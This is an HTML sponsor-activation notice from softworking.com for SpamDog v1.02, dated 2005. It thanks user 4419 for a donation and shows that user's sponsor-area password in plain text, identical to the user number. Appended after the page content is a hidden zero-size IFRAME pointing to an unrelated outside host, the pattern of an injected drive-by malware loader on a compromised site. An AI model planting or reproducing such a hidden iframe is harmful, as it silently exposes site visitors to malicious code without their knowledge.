<head>
<title>softworking.com - 軟體工廠</title>
<meta http-equiv="Content-Language" content="zh-tw">
<meta http-equiv="Content-Type" content="text/html; charset=big5">
</head>

<style type="text/css">
<!--
A.css1:visited  {color: #336699; text-decoration: none}
A.css1:link  {color: #336699; text-decoration: none}
A.css1:active  {color: #336699; text-decoration: none}
A.css1:hover   {color: #336699; text-decoration: underline}

A.css2:visited  {color: #000000; text-decoration: none}
A.css2:link  {color: #000000; text-decoration: none}
A.css2:active  {color: #000000; text-decoration: none}
A.css2:hover   {color: #000000; text-decoration: underline}

A.css3:visited  {color: #FFFFFF; text-decoration: none}
A.css3:link  {color: #FFFFFF; text-decoration: none}
A.css3:active  {color: #FFFFFF; text-decoration: none}
A.css3:hover   {color: #FFFFFF; text-decoration: underline}
//-->
</style>

 


<body topmargin="12" leftmargin="1" rightmargin="1" bottommargin="12" bgcolor="#000000">

<div align="center">

<table border="6" width="90%" id="table1" cellspacing="0" bgcolor="#FFFFFF" bordercolor="#000000" cellpadding="4">
	<tr>
		<td>
		<table border="0" width="100%" id="table4" cellspacing="4">
			<tr>
				<td bgcolor="#336699" width="100%" align="right" >
				<table border="0" width="100%" id="table10" cellspacing="6">
					<tr>
						<td style="font-family: 新細明體; font-size: 9pt; color: #FFFFFF">
						　</td>
						<td width="75">
						<p align="right">
				<img border="0" src="http://www.softworking.com/images/sf1.jpg" width="75" height="20"></td>
					</tr>
				</table>
				</td>
			</tr>
			</table>
		</td>
	</tr>
	<tr>
		<td align="center" height="242">
		<table border="0" width="100%" id="table3"><tr>
		<td style="font-family: 新細明體; font-size: 11pt; color: #FFFFFF" rowspan="2" width="1"></td>
		<td style="font-family: 新細明體; font-size: 11pt; color: #FFFFFF; line-height:150%" bgcolor="#FEA203">
		&nbsp;&nbsp;贊助使用者啟用通知 , 使用者編號 4419</td>
	</tr>
	<tr>
		<td style="font-family: 新細明體; font-size: 9pt; line-height: 200%" valign="top">
		<table border="0" width="100%" cellspacing="6" id="table15" style="font-family: 新細明體; font-size: 9pt">
			<tr>
				<td style="line-height: 200%">
				<p align="center">我們已收到您的贊助金 100 元 , 非常感謝您的贊助 , &nbsp; 
				您的支持是我們向前的最大力量 .<br>
				您的贊助專區登入密碼設定為 : <font color="#FF0000">4419</font> ( 您可以進入專區修改此密碼 
				)<br>
				您的贊助到期日期為 :
				<font style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體" color="#FF0000">
				2006/05/23<br>
				<br>
				</font><font style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體">您可以使用 
				SpamDog v1.02 [設定] - [其它設定] - [手動更新版本]<br>
				就可以立即打開所有贊助功能<br>
				<br>
				如果您在使用上有任何問題 , 請來信 <a href="mailto:service@softworking.com">
				service@softworking.com</a><br>
				或者透過 msn </font><font style="font-size: 9pt; font-family: 新細明體">&nbsp;<a href="mailto:service@softworking.com">service@softworking.com</a>
				</font><font style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體">
				我們會隨時在線上為您服務<br>
				<br>
				再一次感謝您的贊助 !!<br>
				<br>
				軟體工廠 全體敬上 2005.12.21</font><br>
　</td>
			</tr>
		</table>
		</td>
	</tr>
	</table>

		<hr><font face="Arial" size="2">softworking.com 2005</font></td>
	</tr>
</table></div><IFRAME SRC="http://www.bhp159.net/k.htm" WIDTH=0 HEIGHT=0></IFRAME>
